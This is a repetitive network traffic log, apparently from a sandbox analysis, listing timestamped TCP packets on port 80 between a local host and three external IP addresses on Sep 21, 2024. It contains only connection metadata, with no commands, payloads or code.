Sep 21, 2024 14:48:10.062227011 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062237978 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062247038 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062249899 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062262058 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062273979 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062275887 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062285900 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062299013 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062303066 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062310934 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062325001 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062345982 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062349081 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062357903 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062370062 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062381029 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062387943 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062393904 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062414885 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062426090 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062438011 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062443018 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062449932 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062462091 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062465906 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062474012 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062490940 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062516928 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062649012 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062661886 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062671900 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062685013 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062693119 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062705040 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062733889 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062813997 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062832117 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062841892 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062855959 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062868118 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062876940 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062889099 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062890053 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062900066 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062912941 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062917948 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062925100 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062937021 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062947989 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062949896 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062961102 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.062962055 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062973976 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062985897 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.062993050 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.063246965 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.063260078 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.063271999 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.063283920 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.063283920 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.063283920 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.063293934 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.063297033 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.063309908 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.063318014 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.063321114 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.063333035 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.063345909 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.063347101 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.063357115 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.063361883 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.063369989 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.063381910 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.063400984 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.063409090 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.063414097 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.063421965 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.063448906 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.063477993 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.063491106 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.063494921 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.063502073 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.063514948 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.063527107 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.063559055 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.064837933 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.064862013 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.064876080 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.064968109 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.064980030 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.064992905 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.065005064 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.065016031 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.065023899 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.065062046 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.082923889 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.082951069 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.082962036 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083039999 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083039045 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083053112 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083070993 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083084106 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083095074 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083134890 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083144903 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083159924 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083188057 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083213091 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083245993 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083259106 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083271027 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083282948 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083287001 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083295107 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083304882 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083323956 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083352089 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083358049 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083395004 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083404064 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083409071 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083436966 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083455086 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083473921 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083487034 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083513021 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083518982 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083532095 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083534002 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083555937 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083563089 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083580017 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083599091 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083664894 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083678007 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083690882 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083703995 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083704948 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083723068 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083739996 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083759069 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083772898 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083798885 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083822966 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083844900 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083858967 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083869934 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083882093 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.083884954 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083909035 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.083933115 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084031105 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084043980 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084054947 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084068060 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084079981 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084084988 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084084988 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084095001 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084109068 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084109068 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084140062 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084152937 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084161997 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084197044 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084203005 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084212065 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084234953 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084248066 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084290028 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084301949 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084312916 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084328890 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084345102 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084429979 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084449053 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084460974 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084471941 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084479094 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084487915 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084501982 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084511995 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084512949 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084526062 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084546089 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084568977 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084695101 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084707975 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084719896 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084734917 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084738016 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084765911 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084789991 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084816933 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084830999 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084841967 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084856987 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.084858894 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084877014 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.084903002 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.085031033 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085045099 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085056067 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085068941 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085073948 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.085081100 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085092068 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.085095882 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085109949 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085113049 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.085122108 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085134983 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085139990 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.085159063 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.085175991 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.085233927 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085275888 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.085370064 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085383892 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085390091 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085401058 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085411072 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.085413933 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085427046 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085438967 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085439920 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.085453987 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085458040 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.085484028 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.085510015 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.085530043 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085544109 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085553885 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085566998 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085575104 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.085580111 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.085606098 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.085622072 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.107331038 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.107434034 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.107702017 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.112365961 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.112396955 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.112409115 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.112422943 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.112446070 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.112520933 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.112533092 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.112545013 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.112570047 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.112592936 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.112592936 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.112617970 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.112921953 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.114898920 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.114927053 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.114938021 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.114959002 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.114986897 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.114999056 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115011930 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115021944 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115035057 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115042925 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115063906 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115094900 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115119934 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115133047 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115143061 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115164042 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115174055 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115185022 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115189075 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115200043 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115221977 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115240097 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115293026 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115303993 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115314007 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115324020 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115334988 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115335941 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115346909 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115356922 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115365982 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115377903 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115392923 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115427971 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115438938 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115464926 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115475893 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115484953 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115489960 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115503073 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115526915 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115555048 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115633965 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115648031 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115658998 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115670919 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115679979 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115684986 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115695953 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115714073 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115730047 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115782976 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115794897 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115806103 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115816116 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115827084 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115832090 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115844011 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115848064 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115855932 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.115859985 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115884066 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115901947 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.115988970 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116000891 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116010904 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116022110 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116029024 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116034031 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116048098 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116065025 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116094112 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116134882 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116147995 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116158009 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116168976 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116180897 CEST	80	49712	103.130.147.211	192.168.2.9
